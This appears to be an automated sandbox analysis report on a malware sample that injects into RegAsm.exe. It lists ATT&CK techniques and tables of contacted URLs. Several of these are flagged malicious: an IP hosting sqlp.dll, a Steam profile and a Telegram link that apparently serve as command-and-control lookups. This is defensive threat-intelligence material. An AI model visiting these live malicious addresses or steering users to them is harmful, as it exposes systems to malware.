Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	411 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	161 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	411 Process Injection	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	44 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net02	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://steamcommunity.com/?subsection=broadcasts	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869H	0%	Avira URL Cloud	safe
https://steamcommunity.com/my/wishlist/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://steamcommunity.com/market/	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dllg	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	Avira URL Cloud	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dllb	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199780418869/badges	100%	Avira URL Cloud	malware
https://steamcommunity.com/discussions/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199780418869/inventory/	100%	Avira URL Cloud	malware
https://store.steampowered.com/stats/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	Avira URL Cloud	safe
http://cowod.hopto.org_DEBUG.zip/c	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199780418869	100%	Avira URL Cloud	malware
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	Avira URL Cloud	safe
https://store.steampowered.com/steam_refunds/	0%	Avira URL Cloud	safe
https://5.75.211.162/%	100%	Avira URL Cloud	malware
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://5.75.211.162	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://5.75.211.162.exe	0%	Avira URL Cloud	safe
https://t.me/ae5ed	100%	Avira URL Cloud	malware
https://store.steampowered.com/privac	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	Avira URL Cloud	safe
https://steamcommunity.com/workshop/	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dll	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	0%	Avira URL Cloud	safe
https://5.75.211.162/sqlp.dlls.exe	100%	Avira URL Cloud	malware
https://5.75.211.162/E	100%	Avira URL Cloud	malware
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	0%	Avira URL Cloud	safe
https://5.75.211.162/2	100%	Avira URL Cloud	malware
https://store.steampowered.com/privacy_agreement/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	0%	Avira URL Cloud	safe
https://store.steampowered.com/points/shop/	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	0%	Avira URL Cloud	safe
https://5.75.211.162/V	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	Avira URL Cloud	safe
https://5.75.211.162/M	100%	Avira URL Cloud	malware
https://5.75.211.162/c	100%	Avira URL Cloud	malware
https://steamcommunity.com/	0%	Avira URL Cloud	safe
https://5.75.211.162/	100%	Avira URL Cloud	malware
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	Avira URL Cloud	safe
https://5.75.211.162BKFCB	0%	Avira URL Cloud	safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
steamcommunity.com	104.102.49.254	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199780418869	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/my/wishlist/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllg	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869H	RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	file.exe	false	URL Reputation: safe	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net02	file.exe	false	URL Reputation: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/news/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dllb	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/badges	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	true	Avira URL Cloud: malware	unknown
http://www.valvesoftware.com/legal.htm	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/discussions/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/stats/	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org_DEBUG.zip/c	file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/%	RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0	file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://5.75.211.162	76561199780418869[1].htm.3.dr	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privac	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://t.me/ae5ed	file.exe, 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://5.75.211.162.exe	RegAsm.exe, 00000003.00000002.2183942555.000000000058A000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://5.75.211.162/sqlp.dll	RegAsm.exe, 00000003.00000002.2183942555.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://5.75.211.162/sqlp.dlls.exe	RegAsm.exe, 00000003.00000002.2183942555.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/E	RegAsm.exe, 00000003.00000002.2185117153.0000000000DEC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://www.entrust.net/rpa03	file.exe	false	URL Reputation: safe	unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/points/shop/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe	false	URL Reputation: safe	unknown
http://upx.sf.net	Amcache.hve.9.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/2	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/V	RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	RegAsm.exe, 00000003.00000002.2183942555.000000000048B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2183942555.0000000000483000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/c	RegAsm.exe, 00000003.00000002.2185117153.0000000000E10000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
